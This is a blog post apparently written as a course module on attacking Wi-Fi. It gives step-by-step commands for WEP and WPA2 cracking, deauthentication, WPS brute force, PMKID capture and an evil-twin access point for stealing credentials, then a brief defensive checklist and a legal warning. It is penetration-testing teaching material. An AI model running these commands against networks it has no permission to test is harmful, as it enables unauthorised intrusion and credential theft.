Skip to main content

Wireless Network Hacking

Introduction to Wireless Security

Wireless networks (Wi-Fi) are vulnerable to various attacks due to weak encryption, misconfigurations, and physical accessibility. This guide covers **reconnaissance, exploitation, and defense** techniques for both **WEP, WPA/WPA2, and WPA3** networks.


1. Wireless Reconnaissance

A. Identifying Networks

- Scan for nearby networks:

  bash

  sudo iwconfig          # List available interfaces

  sudo airmon-ng start wlan0  # Enable monitor mode

  sudo airodump-ng wlan0mon   # Scan networks      

  

Key details :

  -BSSID (MAC address of AP)

  - ESSID (Network name)

  - Channel, Encryption (WEP/WPA/WPA2)


B. Target Selection

- Prioritize weak networks :

  - WEP (Easily crackable)

  - WPA/WPA2-PSK (Vulnerable to brute force)

  - Open Wi-Fi (No encryption)


2. Wireless Attacks

A. WEP Cracking (Outdated but Still Found)

WEP uses RC4 encryption and is easily crackable due to IV (Initialization Vector) reuse.


Steps:

1. Capture packets:

   bash

     sudo airodump-ng -c <channel> --bssid <BSSID> -w wep_crack wlan0mon    

2. Force IV generation (ARP replay attack):

   bash

   sudo aireplay-ng -3 -b <BSSID> -h <client_MAC> wlan0mon     

   

3. Crack with aircrack-ng:

   bash

   sudo aircrack-ng wep_crack-01.cap


B. WPA/WPA2 Cracking

WPA/WPA2-PSK (Pre-Shared Key) is vulnerable to brute force/dictionary attacks.


Steps:

1. Capture WPA Handshake (4-way authentication):

   bash

   sudo airodump-ng -c <channel> --bssid <BSSID> -w handshake wlan0mon

   

2. Deauthenticate a client to force reconnection:

   bash

   sudo aireplay-ng -0 5 -a <BSSID> -c <client_MAC> wlan0mon    

 

3. Crack with  hashcat or aircrack-ng :

  bash

   aircrack-ng -w rockyou.txt handshake-01.cap   

   or

  bash

   hashcat -m 22000 handshake.hc22000 rockyou.txt     

  

C. Evil Twin Attack (Rogue AP)

- Creates a fake Wi-Fi network to steal credentials.

Tools :  airbase-ng ,  hostapd-wpe .


Steps:

1. Set up rogue AP:

   bash

      sudo airbase-ng -a <BSSID> --essid "Free_WiFi" -c <channel> wlan0mon       

2. Redirect traffic:    

   bash

   sudo dnschef -i <interface> --fakeip 192.168.1.1     

   

3. Capture credentials when victims connect.


D. WPS (Wi-Fi Protected Setup) Attack

- WPS PIN brute force (if enabled).

Tools :  reaver , bully.


Steps:

bash

     sudo reaver -i wlan0mon -b <BSSID> -vv -K 1      


E. KRACK Attack (Key Reinstallation Attack)

- Exploits WPA2's 4-way handshake vulnerability.

Tool : krackattacks-scripts .


Steps:

1. Monitor network traffic.

2. Forge handshake packets to intercept data.


3. Advanced Attacks

A. PMKID Attack (WPA/WPA2)

- Extracts PMKID (Pairwise Master Key ID) without handshake.

Tool : hcxdumptool ,  hashcat .


Steps:

1. Capture PMKID:

   bash

   sudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1    

   

2. Crack with hashcat :

   bash

      hashcat -m 16800 pmkid.hc16800 rockyou.txt      

  

B. WPA3 Downgrade Attack

- Forces WPA3 → WPA2 fallback.

Tool  :  dragonblood .


4. Defensive Measures

A. Securing Wi-Fi Networks

✔ Use WPA3-SAE (if available) 

✔ Disable WPS (Vulnerable to brute force)  

✔ Use strong passwords (Avoid dictionary words)  

✔ Enable MAC filtering (Whitelist devices)  

✔ Disable SSID broadcasting (Hidden network)  

✔ Monitor for rogue APs (Airodump-ng, Kismet)  


B. Detection Tools

- Wireshark (Analyze Wi-Fi traffic)  

- Kismet (Wireless IDS)  

- Aircrack-ng (Test security)  


5. Hands-On Lab

Lab: Cracking WPA2 with Aircrack-ng

1. Enable monitor mode :

   bash

       sudo airmon-ng start wlan0       

   

2. Scan networks:

   bash

      sudo airodump-ng wlan0mon       

3. Capture handshake :

   bash

   sudo airodump-ng -c 6 --bssid 00:11:22:33:44:55 -w capture wlan0mon       

4. Deauth a client :

   bash

   sudo aireplay-ng -0 5 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF wlan0mon       

  

5. Crack the handshake :

   bash

   sudo aircrack-ng -w rockyou.txt capture-01.cap     


6. Legal & Ethical Considerations

⚠ Only hack networks you own or have permission to test.  

⚠ Unauthorized access is illegal (Computer Fraud and Abuse Act, etc.).  


Conclusion

- WEP is trivial to crack (RC4 weakness).  

- WPA/WPA2 is vulnerable to brute force (Weak passwords).  

- WPA3 improves security but has downgrade risks.  

- Evil Twin & WPS attacks are still effective.  


🔹 Next Steps:  

Module 9: Social Engineering & Phishing  

- Try Wi-Fi challenges on Hack The Box / TryHackMe.  

- Learn RF hacking (Bluetooth, Zigbee).  

- Explore enterprise Wi-Fi security (RADIUS, 802.1X).  


Would you like a step-by-step Evil Twin attack demo? 🚀

Comments

Post a Comment

Popular posts from this blog

Bug Bounty Hunter – The Professional Vulnerability Hunter

A Bug Bounty Hunter is a cybersecurity researcher who finds and reports security flaws in websites, apps, and systems in exchange for cash rewards (bounties) from companies like Google , Facebook , and Uber.  💰 How Bug Bounties Work    1. Target Selection – Choose a program (e.g., HackerOne, Bugcrowd).   2. Recon & Testing – Hunt for vulnerabilities (e.g., SQLi, XSS, RCE).   3. Submit a Report – Document the bug with PoC (Proof of Concept).   4. Get Paid – Rewards range from  $50 to $500,000+ per bug.   🔥 Top Bug Bounty Platforms  |    Platform     |     Popular Programs   |    Avg. Payout |   |-------------|---------------------|------------|   |    HackerOne   | Uber, Twitter, GitHub | $500–$20K |   |     Bugcrowd    | AWS, Tesla, Cisco | $300–$15K |   |    Intigriti...
Post a Comment
Read more

Vulnerability Assessor – The Proactive Security Specialist

A Vulnerability Assessor is a cybersecurity professional who identifies, classifies, and prioritizes security weaknesses in systems, networks, and applications before attackers exploit them. Unlike penetration testers (who exploit flaws), assessors focus on discovery and risk analysis.  🔍 Core Responsibilities 1. Vulnerability Scanning       - Run automated scans (Nessus, Qualys, OpenVAS).      - Identify CVEs, misconfigurations, and outdated software.   2. Risk Assessment & Prioritization       - Rate vulnerabilities using CVSS scores.      - Focus on critical risks (e.g., RCE, SQLi).   3. Compliance Auditing     - Check adherence to PCI DSS, HIPAA, NIST.   4. Reporting & Remediation Guidance    - Provide actionable fixes (patching, hardening).  🛠️ Key Tools & Technologies |    Category       |...
Post a Comment
Read more

Red Teamer – The Elite Offensive Security Role

A Red Teamer is an advanced cybersecurity professional who simulates real-world attacks like advanced threat actors (APT groups, nation-states) to test an organization's defenses. Unlike penetration testers (who focus on finding vulnerabilities), Red Teams emulate stealthy, targeted attacks to evade detection.   🔥 Core Responsibilities   1. Adversary Emulation    - Mimic real APTs (MITRE ATT&CK framework).      - Use custom malware, C2 frameworks (Cobalt Strike, Sliver).   2. Physical & Social Engineering      - Phishing, USB drops, impersonation attacks.   3. Evasion & Lateral Movement      - Bypass EDR/XDR, AV, and SIEM detection.      - Privilege escalation, domain persistence.   4. Reporting & Purple Teaming      - Help Blue Team improve detection rules.  🛠️ Top Red Team Tools |   Category...
Post a Comment
Read more